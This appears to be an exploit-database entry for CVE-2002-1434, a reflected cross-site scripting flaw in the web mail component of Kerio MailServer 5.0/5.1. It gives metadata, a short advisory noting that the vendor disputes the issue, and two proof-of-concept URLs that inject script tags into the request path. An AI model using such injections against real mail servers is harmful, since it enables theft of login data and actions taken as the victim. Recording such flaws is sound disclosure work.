Kerio MailServer 5.0/5.1 Web Mail - Multiple Cross-Site Scripting Vulnerabilities
Author: Abraham Lincoln
type: webapps
platform: cgi
port:
date_added: 2002-08-19
date_updated: 2012-10-04
verified: 1
codes: CVE-2002-1434;OSVDB-6296
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/5507/info
Reportedly, Kerio Mailserver is vulnerable to cross site scripting attacks. The vulnerability is present in Kerio Mailserver's web mail component.
An attacker may exploit this vulnerability by causing a victim user to follow a malicious link. Exploitation may result in the compromise of authentication data, or in script code taking actions as the authenticated user.
*** The vendor has stated that this is not a vulnerability.
*** Proof of concept has been provided.
http://keriowebmail/<script>alert('THisIsREAL0wned')</script>
http://keriowebmail/passwd<script>alert('VERYVULNERABLE')</script>